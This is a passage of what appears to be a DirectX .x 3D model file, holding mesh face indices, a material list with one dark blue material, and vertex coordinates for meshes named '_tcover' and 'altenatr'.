4;633,614,1014,1013;, 4;614,595,1015,1014;, 4;1014,1015,949,952;, 4;1015,1016,948,949;, 4;595,576,1016,1015;, 4;576,557,1017,1016;, 4;1016,1017,946,948;, 4;1017,1018,944,946;, 4;557,538,1018,1017;, 4;538,519,1019,1018;, 4;1018,1019,941,944;, 4;1019,1020,938,941;, 4;519,500,1020,1019;, 4;500,481,1021,1020;, 4;1020,1021,937,938;, 3;1021,936,937;, 4;1021,1022,934,936;, 4;481,462,1022,1021;, 4;462,443,1023,1022;, 4;1022,1023,931,934;, 3;1023,930,931;, 4;1023,1024,927,930;, 4;443,424,1024,1023;, 4;424,405,1025,1024;, 4;1024,1025,926,927;, 4;1025,1026,923,926;, 4;405,386,1026,1025;, 4;386,367,1027,1026;, 4;1026,1027,921,923;, 4;1027,998,920,921;, 4;367,348,998,1027;, 4;348,899,999,998;, 4;998,999,919,918;, 3;998,918,920;, 4;999,1000,922,919;, 4;899,880,1000,999;, 4;880,861,1001,1000;, 4;1000,1001,924,922;, 3;924,1001,925;, 4;1001,1002,928,925;, 4;861,842,1002,1001;, 4;842,823,1003,1002;, 4;1002,1003,929,928;, 5;1003,1004,933,932,929;, 4;823,804,1004,1003;, 4;804,785,1005,1004;, 4;1004,1005,935,933;, 5;1005,1006,940,939,935;, 4;785,766,1006,1005;, 4;766,747,1007,1006;, 4;1006,1007,942,940;, 4;1007,1008,943,942;, 4;747,728,1008,1007;, 4;728,709,1009,1008;, 4;1008,1009,945,943;, 4;1009,1010,947,945;, 4;709,690,1010,1009;, 4;690,671,1011,1010;, 4;1010,1011,950,947;, 4;1011,1012,951,950;, 4;671,652,1012,1011;, 4;653,634,633,652;, 4;634,615,614,633;, 4;615,596,595,614;, 4;616,597,596,615;, 4;635,616,615,634;, 4;654,635,634,653;, 4;673,654,653,672;, 4;672,653,652,671;, 4;691,672,671,690;, 4;692,673,672,691;, 4;711,692,691,710;, 4;710,691,690,709;, 4;729,710,709,728;, 4;730,711,710,729;, 4;731,712,711,730;, 4;712,693,692,711;, 4;693,674,673,692;, 4;674,655,654,673;, 4;655,636,635,654;, 4;636,617,616,635;, 4;617,598,597,616;, 4;598,579,578,597;, 4;579,560,559,578;, 4;578,559,558,577;, 4;577,558,557,576;, 4;596,577,576,595;, 4;597,578,577,596;, 4;560,541,540,559;, 4;559,540,539,558;, 4;558,539,538,557;, 4;539,520,519,538;, 4;540,521,520,539;, 4;541,522,521,540;, 4;522,503,502,521;, 4;521,502,501,520;, 4;520,501,500,519;, 4;501,482,481,500;, 4;502,483,482,501;, 4;503,484,483,502;, 4;484,465,464,483;, 4;483,464,463,482;, 4;482,463,462,481;, 4;463,444,443,462;, 4;464,445,444,463;, 4;465,446,445,464;, 4;446,427,426,445;, 4;445,426,425,444;, 4;444,425,424,443;, 4;425,406,405,424;, 4;426,407,406,425;, 4;427,408,407,426;, 4;408,389,388,407;, 4;407,388,387,406;, 4;388,369,368,387;, 4;389,370,369,388;, 4;370,351,350,369;, 4;351,902,901,350;, 4;350,901,900,349;, 4;369,350,349,368;, 4;368,349,348,367;, 4;349,900,899,348;, 4;900,881,880,899;, 4;881,862,861,880;, 4;882,863,862,881;, 4;883,864,863,882;, 4;902,883,882,901;, 4;901,882,881,900;, 4;864,845,844,863;, 4;863,844,843,862;, 4;862,843,842,861;, 4;843,824,823,842;, 4;844,825,824,843;, 4;845,826,825,844;, 4;826,807,806,825;, 4;825,806,805,824;, 4;824,805,804,823;, 4;805,786,785,804;, 4;806,787,786,805;, 4;807,788,787,806;, 4;788,769,768,787;, 4;787,768,767,786;, 4;786,767,766,785;, 4;767,748,747,766;, 4;768,749,748,767;, 4;769,750,749,768;, 4;750,731,730,749;, 4;749,730,729,748;, 4;748,729,728,747;, 4;387,368,367,386;, 4;406,387,386,405;, 4;657,638,637,656;, 4;656,637,636,655;, 4;637,618,617,636;, 4;638,619,618,637;, 4;639,620,619,638;, 4;658,639,638,657;, 4;677,658,657,676;, 4;676,657,656,675;, 4;675,656,655,674;, 4;694,675,674,693;, 4;695,676,675,694;, 4;696,677,676,695;, 4;697,678,677,696;, 4;698,679,678,697;, 4;679,660,659,678;, 4;660,641,640,659;, 4;641,622,621,640;, 4;622,603,602,621;, 4;621,602,601,620;, 4;640,621,620,639;, 4;659,640,639,658;, 4;678,659,658,677;, 4;680,661,660,679;, 4;661,642,641,660;, 4;642,623,622,641;, 4;623,604,603,622;, 4;604,585,584,603;, 4;603,584,583,602;, 4;602,583,582,601;, 4;601,582,581,600;, 4;600,581,580,599;, 4;599,580,579,598;, 4;618,599,598,617;, 4;619,600,599,618;, 4;620,601,600,619;, 4;582,563,562,581;, 4;581,562,561,580;, 4;580,561,560,579;, 4;561,542,541,560;, 4;562,543,542,561;, 4;563,544,543,562;, 4;564,545,544,563;, 4;565,546,545,564;, 4;566,547,546,565;, 4;585,566,565,584;, 4;584,565,564,583;, 4;583,564,563,582;, 4;545,526,525,544;, 4;544,525,524,543;, 4;543,524,523,542;, 4;542,523,522,541;, 4;523,504,503,522;, 4;524,505,504,523;, 4;525,506,505,524;, 4;526,507,506,525;, 4;527,508,507,526;, 4;528,509,508,527;, 4;529,510,509,528;, 4;548,529,528,547;, 4;567,548,547,566;, 4;586,567,566,585;, 4;605,586,585,604;, 4;624,605,604,623;, 4;643,624,623,642;, 4;662,643,642,661;, 4;681,662,661,680;, 4;700,681,680,699;, 4;719,700,699,718;, 4;738,719,718,737;, 4;757,738,737,756;, 4;756,737,736,755;, 4;755,736,735,754;, 4;754,735,734,753;, 4;753,734,733,752;, 4;752,733,732,751;, 4;751,732,731,750;, 4;732,713,712,731;, 4;733,714,713,732;, 4;734,715,714,733;, 4;735,716,715,734;, 4;736,717,716,735;, 4;737,718,717,736;, 4;718,699,698,717;, 4;717,698,697,716;, 4;716,697,696,715;, 4;715,696,695,714;, 4;714,695,694,713;, 4;713,694,693,712;, 4;699,680,679,698;, 4;776,757,756,775;, 4;775,756,755,774;, 4;774,755,754,773;, 4;773,754,753,772;, 4;772,753,752,771;, 4;771,752,751,770;, 4;770,751,750,769;, 4;789,770,769,788;, 4;790,771,770,789;, 4;791,772,771,790;, 4;792,773,772,791;, 4;793,774,773,792;, 4;794,775,774,793;, 4;795,776,775,794;, 4;814,795,794,813;, 4;813,794,793,812;, 4;812,793,792,811;, 4;811,792,791,810;, 4;810,791,790,809;, 4;809,790,789,808;, 4;808,789,788,807;, 4;827,808,807,826;, 4;828,809,808,827;, 4;829,810,809,828;, 4;830,811,810,829;, 4;831,812,811,830;, 4;832,813,812,831;, 4;833,814,813,832;, 4;852,833,832,851;, 4;851,832,831,850;, 4;870,851,850,869;, 4;871,852,851,870;, 4;890,871,870,889;, 4;889,870,869,888;, 4;908,889,888,907;, 4;357,908,907,356;, 4;376,357,356,375;, 4;395,376,375,394;, 4;396,377,376,395;, 4;377,358,357,376;, 4;358,909,908,357;, 4;909,890,889,908;, 4;907,888,887,906;, 4;356,907,906,355;, 4;375,356,355,374;, 4;394,375,374,393;, 4;393,374,373,392;, 4;392,373,372,391;, 4;391,372,371,390;, 4;390,371,370,389;, 4;371,352,351,370;, 4;372,353,352,371;, 4;353,904,903,352;, 4;352,903,902,351;, 4;903,884,883,902;, 4;904,885,884,903;, 4;905,886,885,904;, 4;906,887,886,905;, 4;355,906,905,354;, 4;374,355,354,373;, 4;373,354,353,372;, 4;354,905,904,353;, 4;886,867,866,885;, 4;885,866,865,884;, 4;884,865,864,883;, 4;865,846,845,864;, 4;866,847,846,865;, 4;867,848,847,866;, 4;868,849,848,867;, 4;869,850,849,868;, 4;888,869,868,887;, 4;887,868,867,886;, 4;849,830,829,848;, 4;848,829,828,847;, 4;847,828,827,846;, 4;846,827,826,845;, 4;850,831,830,849;, 4;415,396,395,414;, 4;414,395,394,413;, 4;433,414,413,432;, 4;434,415,414,433;, 4;453,434,433,452;, 4;452,433,432,451;, 4;451,432,431,450;, 4;450,431,430,449;, 4;449,430,429,448;, 4;448,429,428,447;, 4;447,428,427,446;, 4;428,409,408,427;, 4;429,410,409,428;, 4;430,411,410,429;, 4;431,412,411,430;, 4;432,413,412,431;, 4;413,394,393,412;, 4;412,393,392,411;, 4;411,392,391,410;, 4;410,391,390,409;, 4;409,390,389,408;, 4;466,447,446,465;, 4;467,448,447,466;, 4;468,449,448,467;, 4;469,450,449,468;, 4;470,451,450,469;, 4;471,452,451,470;, 4;472,453,452,471;, 4;491,472,471,490;, 4;490,471,470,489;, 4;489,470,469,488;, 4;488,469,468,487;, 4;487,468,467,486;, 4;486,467,466,485;, 4;485,466,465,484;, 4;504,485,484,503;, 4;505,486,485,504;, 4;506,487,486,505;, 4;507,488,487,506;, 4;508,489,488,507;, 4;509,490,489,508;, 4;510,491,490,509;, 4;547,528,527,546;, 4;546,527,526,545;, 4;251,195,979,977;, 4;146,195,251,149;, 4;102,77,146,149;, 4;195,194,980,979;, 4;129,194,195,146;, 4;77,78,129,146;, 4;194,196,981,980;, 4;127,196,194,129;, 4;78,107,127,129;, 4;125,197,196,127;, 4;107,105,125,127;, 4;105,0,117,125;, 4;117,198,197,125;, 4;197,198,986,983;, 4;196,197,983,981;, 4;114,199,198,117;, 4;0,1,114,117;, 4;1,110,118,114;, 4;118,200,199,114;, 4;199,200,992,989;, 4;200,201,995,992;, 4;120,201,200,118;, 4;110,108,120,118;, 4;198,199,989,986;, 4;663,644,643,662;, 4;644,625,624,643;, 4;625,606,605,624;, 4;626,607,606,625;, 4;645,626,625,644;, 4;664,645,644,663;, 4;683,664,663,682;, 4;684,665,664,683;, 4;665,646,645,664;, 4;646,627,626,645;, 4;627,608,607,626;, 4;608,589,588,607;, 4;607,588,587,606;, 4;606,587,586,605;, 4;587,568,567,586;, 4;588,569,568,587;, 4;589,570,569,588;, 4;570,551,550,569;, 4;569,550,549,568;, 4;568,549,548,567;, 4;549,530,529,548;, 4;550,531,530,549;, 4;551,532,531,550;, 4;532,513,512,531;, 4;531,512,511,530;, 4;530,511,510,529;, 4;511,492,491,510;, 4;512,493,492,511;, 4;513,494,493,512;, 4;494,475,474,493;, 4;493,474,473,492;, 4;492,473,472,491;, 4;473,454,453,472;, 4;474,455,454,473;, 4;475,456,455,474;, 4;456,437,436,455;, 4;455,436,435,454;, 4;454,435,434,453;, 4;435,416,415,434;, 4;436,417,416,435;, 4;437,418,417,436;, 4;418,399,398,417;, 4;417,398,397,416;, 4;416,397,396,415;, 4;397,378,377,396;, 4;398,379,378,397;, 4;399,380,379,398;, 4;380,361,360,379;, 4;361,912,911,360;, 4;360,911,910,359;, 4;379,360,359,378;, 4;378,359,358,377;, 4;359,910,909,358;, 4;910,891,890,909;, 4;911,892,891,910;, 4;912,893,892,911;, 4;893,874,873,892;, 4;892,873,872,891;, 4;891,872,871,890;, 4;872,853,852,871;, 4;873,854,853,872;, 4;874,855,854,873;, 4;855,836,835,854;, 4;854,835,834,853;, 4;853,834,833,852;, 4;834,815,814,833;, 4;835,816,815,834;, 4;836,817,816,835;, 4;817,798,797,816;, 4;816,797,796,815;, 4;815,796,795,814;, 4;796,777,776,795;, 4;797,778,777,796;, 4;798,779,778,797;, 4;779,760,759,778;, 4;778,759,758,777;, 4;777,758,757,776;, 4;758,739,738,757;, 4;759,740,739,758;, 4;760,741,740,759;, 4;741,722,721,740;, 4;740,721,720,739;, 4;739,720,719,738;, 4;720,701,700,719;, 4;721,702,701,720;, 4;722,703,702,721;, 4;703,684,683,702;, 4;702,683,682,701;, 4;701,682,681,700;, 4;682,663,662,681;, 4;666,647,646,665;, 4;647,628,627,646;, 4;628,609,608,627;, 4;609,590,589,608;, 4;610,591,590,609;, 4;629,610,609,628;, 4;648,629,628,647;, 4;667,648,647,666;, 4;686,667,666,685;, 4;705,686,685,704;, 4;704,685,684,703;, 4;685,666,665,684;, 4;723,704,703,722;, 4;724,705,704,723;, 4;743,724,723,742;, 4;742,723,722,741;, 4;761,742,741,760;, 4;762,743,742,761;, 4;781,762,761,780;, 4;780,761,760,779;, 4;799,780,779,798;, 4;800,781,780,799;, 4;819,800,799,818;, 4;818,799,798,817;, 4;837,818,817,836;, 4;838,819,818,837;, 4;857,838,837,856;, 4;856,837,836,855;, 4;875,856,855,874;, 4;876,857,856,875;, 4;895,876,875,894;, 4;914,895,894,913;, 4;363,914,913,362;, 4;382,363,362,381;, 4;401,382,381,400;, 4;420,401,400,419;, 4;419,400,399,418;, 4;400,381,380,399;, 4;381,362,361,380;, 4;362,913,912,361;, 4;913,894,893,912;, 4;894,875,874,893;, 4;439,420,419,438;, 4;438,419,418,437;, 4;457,438,437,456;, 4;458,439,438,457;, 4;477,458,457,476;, 4;476,457,456,475;, 4;495,476,475,494;, 4;496,477,476,495;, 4;515,496,495,514;, 4;514,495,494,513;, 4;533,514,513,532;, 4;534,515,514,533;, 4;553,534,533,552;, 4;552,533,532,551;, 4;571,552,551,570;, 4;572,553,552,571;, 4;591,572,571,590;, 4;590,571,570,589;, 4;668,649,648,667;, 4;649,630,629,648;, 4;630,611,610,629;, 4;611,592,591,610;, 4;592,573,572,591;, 4;573,554,553,572;, 4;554,535,534,553;, 4;535,516,515,534;, 4;516,497,496,515;, 4;497,478,477,496;, 4;478,459,458,477;, 4;459,440,439,458;, 4;440,421,420,439;, 4;421,402,401,420;, 4;402,383,382,401;, 4;383,364,363,382;, 4;364,915,914,363;, 4;915,896,895,914;, 4;896,877,876,895;, 4;877,858,857,876;, 4;858,839,838,857;, 4;839,820,819,838;, 4;820,801,800,819;, 4;801,782,781,800;, 4;782,763,762,781;, 4;763,744,743,762;, 4;744,725,724,743;, 4;725,706,705,724;, 4;706,687,686,705;, 4;687,668,667,686;, 4;669,650,649,668;, 4;650,631,630,649;, 4;631,612,611,630;, 4;612,593,592,611;, 4;593,574,573,592;, 4;574,555,554,573;, 4;555,536,535,554;, 4;536,517,516,535;, 4;517,498,497,516;, 4;498,479,478,497;, 4;479,460,459,478;, 4;460,441,440,459;, 4;441,422,421,440;, 4;422,403,402,421;, 4;403,384,383,402;, 4;384,365,364,383;, 4;365,916,915,364;, 4;916,897,896,915;, 4;897,878,877,896;, 4;878,859,858,877;, 4;859,840,839,858;, 4;840,821,820,839;, 4;821,802,801,820;, 4;802,783,782,801;, 4;783,764,763,782;, 4;764,745,744,763;, 4;745,726,725,744;, 4;726,707,706,725;, 4;707,688,687,706;, 4;688,669,668,687;, 4;670,651,650,669;, 4;651,632,631,650;, 4;632,613,612,631;, 4;613,594,593,612;, 4;594,575,574,593;, 4;575,556,555,574;, 4;556,537,536,555;, 4;537,518,517,536;, 4;518,499,498,517;, 4;499,480,479,498;, 4;480,461,460,479;, 4;461,442,441,460;, 4;442,423,422,441;, 4;423,404,403,422;, 4;404,385,384,403;, 4;385,366,365,384;, 4;366,917,916,365;, 4;917,898,897,916;, 4;898,879,878,897;, 4;879,860,859,878;, 4;860,841,840,859;, 4;841,822,821,840;, 4;822,803,802,821;, 4;803,784,783,802;, 4;784,765,764,783;, 4;765,746,745,764;, 4;746,727,726,745;, 4;727,708,707,726;, 4;708,689,688,707;, 4;689,670,669,688;, 4;201,202,993,995;, 4;122,202,201,120;, 4;108,79,122,120;, 4;209,210,985,987;, 4;144,210,209,142;, 4;98,75,144,142;, 4;210,211,984,985;, 4;193,211,210,144;, 4;75,76,193,144;, 4;134,205,204,132;, 4;113,111,134,132;, 4;111,2,136,134;, 4;136,206,205,134;, 4;205,206,991,997;, 4;204,205,997,996;, 4;206,207,990,991;, 4;138,207,206,136;, 4;2,3,138,136;, 4;3,100,140,138;, 4;140,208,207,138;, 4;207,208,988,990;, 4;208,209,987,988;, 4;142,209,208,140;, 4;100,98,142,140;, 4;202,203,994,993;, 4;130,203,202,122;, 4;79,80,130,122;, 4;203,204,996,994;, 4;132,204,203,130;, 4;80,113,132,130;; MeshMaterialList { 1; 1012; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _tcover Frame _altenatr { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh altenatr { 234; -1.163968;-0.108402;-1.607816;, -1.163968;-0.108402;-1.598959;, -1.163967;-0.160385;-1.597693;, -1.163967;-0.195041;-1.590102;, -1.163965;-0.208903;-1.577451;, -1.163942;-0.208903;-1.303474;, -1.163940;-0.198506;-1.293353;, -1.163940;-0.170782;-1.288291;, -1.130281;-0.102340;-1.607818;, -1.130280;-0.102340;-1.598960;, -1.112856;-0.151188;-1.597697;, -1.101240;-0.183754;-1.590107;, -1.096593;-0.196781;-1.577455;, -1.096568;-0.196781;-1.303477;, -1.100055;-0.187012;-1.293355;, -1.109345;-0.160958;-1.288294;, -1.100658;-0.084888;-1.607820;, -1.100657;-0.084888;-1.598963;, -1.067912;-0.124710;-1.597700;, -1.046081;-0.151257;-1.590109;, -1.037347;-0.161876;-1.577460;, -1.037324;-0.161876;-1.303481;, -1.043871;-0.153913;-1.293359;, -1.061336;-0.132674;-1.288296;, -1.078672;-0.058150;-1.607821;, -1.078672;-0.058150;-1.598964;, -1.034551;-0.084143;-1.597702;, -1.005139;-0.101470;-1.590112;, -0.993373;-0.108402;-1.577462;, -0.993349;-0.108402;-1.303483;, -1.002170;-0.103203;-1.293361;, -1.025701;-0.089341;-1.288298;, -1.066973;-0.025351;-1.607822;, -1.066973;-0.025351;-1.598965;, -1.016802;-0.034379;-1.597704;, -0.983355;-0.040398;-1.590114;, -0.969975;-0.042804;-1.577462;, -0.969951;-0.042804;-1.303486;, -0.979983;-0.040999;-1.293364;, -1.006740;-0.036184;-1.288300;, -1.066973;0.009552;-1.607822;, -1.066973;0.009552;-1.598965;, -1.016802;0.018578;-1.597704;, -0.983355;0.024595;-1.590114;, -0.969975;0.027004;-1.577462;, -0.969951;0.027004;-1.303486;, -0.979983;0.025198;-1.293364;, -1.006740;0.020384;-1.288300;, -1.078672;0.042351;-1.607821;, -1.078672;0.042351;-1.598964;, -1.034551;0.068342;-1.597702;, -1.005139;0.085670;-1.590112;, -0.993373;0.092601;-1.577462;, -0.993349;0.092601;-1.303483;, -1.002170;0.087403;-1.293361;, -1.025701;0.073540;-1.288298;, -1.100658;0.069089;-1.607820;, -1.100657;0.069089;-1.598963;, -1.067912;0.108911;-1.597700;, -1.046081;0.135459;-1.590109;, -1.037347;0.146077;-1.577460;, -1.037324;0.146077;-1.303481;, -1.043871;0.138112;-1.293359;, -1.061336;0.116874;-1.288296;, -1.130281;0.086541;-1.607818;, -1.130280;0.086541;-1.598960;, -1.112856;0.135390;-1.597697;, -1.101240;0.167954;-1.590107;, -1.100055;0.171211;-1.293355;, -1.109345;0.145158;-1.288294;, -1.163968;0.092601;-1.607816;, -1.163968;0.092601;-1.598959;, -1.163967;0.144585;-1.597693;, -1.163967;0.179240;-1.590102;, -1.163940;0.182707;-1.293353;, -1.163940;0.154982;-1.288291;, -1.197655;0.086541;-1.607814;, -1.197653;0.086541;-1.598957;, -1.215076;0.135390;-1.597690;, -1.231337;0.180980;-1.577446;, -1.231313;0.180980;-1.303467;, -1.227827;0.171211;-1.293347;, -1.218534;0.145158;-1.288286;, -1.227277;0.069089;-1.607811;, -1.227276;0.069089;-1.598956;, -1.260022;0.108911;-1.597688;, -1.281853;0.135459;-1.590094;, -1.290583;0.146077;-1.577442;, -1.290559;0.146077;-1.303464;, -1.284009;0.138112;-1.293343;, -1.266544;0.116874;-1.288284;, -1.249265;0.042351;-1.607810;, -1.249262;0.042351;-1.598954;, -1.293381;0.068342;-1.597686;, -1.322795;0.085670;-1.590092;, -1.334558;0.092601;-1.577439;, -1.334534;0.092601;-1.303462;, -1.325708;0.087403;-1.293341;, -1.302178;0.073540;-1.288281;, -1.260963;0.009552;-1.607809;, -1.260962;0.009552;-1.598954;, -1.311131;0.018578;-1.597684;, -1.344579;0.024595;-1.590092;, -1.357957;0.027004;-1.577437;, -1.357932;0.027004;-1.303460;, -1.347896;0.025198;-1.293340;, -1.321138;0.020384;-1.288280;, -1.260963;-0.025351;-1.607809;, -1.260962;-0.025351;-1.598954;, -1.311131;-0.034379;-1.597684;, -1.344579;-0.040398;-1.590092;, -1.357957;-0.042804;-1.577437;, -1.357932;-0.042804;-1.303460;, -1.347896;-0.040999;-1.293340;, -1.321138;-0.036184;-1.288280;, -1.249265;-0.058150;-1.607810;, -1.249262;-0.058150;-1.598954;, -1.293381;-0.084143;-1.597686;, -1.322795;-0.101470;-1.590092;, -1.334558;-0.108402;-1.577439;, -1.334534;-0.108402;-1.303462;, -1.325708;-0.103203;-1.293341;, -1.302178;-0.089341;-1.288281;, -1.227277;-0.084888;-1.607811;, -1.227276;-0.084888;-1.598956;, -1.260022;-0.124710;-1.597688;, -1.281853;-0.151257;-1.590094;, -1.290583;-0.161876;-1.577442;, -1.290559;-0.161876;-1.303464;, -1.284009;-0.153913;-1.293343;, -1.266544;-0.132674;-1.288284;, -1.197655;-0.102340;-1.607814;, -1.197653;-0.102340;-1.598957;, -1.215076;-0.151188;-1.597690;, -1.226692;-0.183754;-1.590098;, -1.231337;-0.196781;-1.577446;, -1.231313;-0.196781;-1.303467;, -1.227827;-0.187012;-1.293347;, -1.218534;-0.160958;-1.288286;, -1.225135;0.182096;-1.479541;, -1.170147;0.191988;-1.479543;, -1.170156;0.191988;-1.572866;, -1.225144;0.182096;-1.572864;, -1.285127;0.149286;-1.479537;, -1.236773;0.177773;-1.479539;, -1.236781;0.177773;-1.572863;, -1.285137;0.149286;-1.572860;, -1.330506;0.097516;-1.479534;, 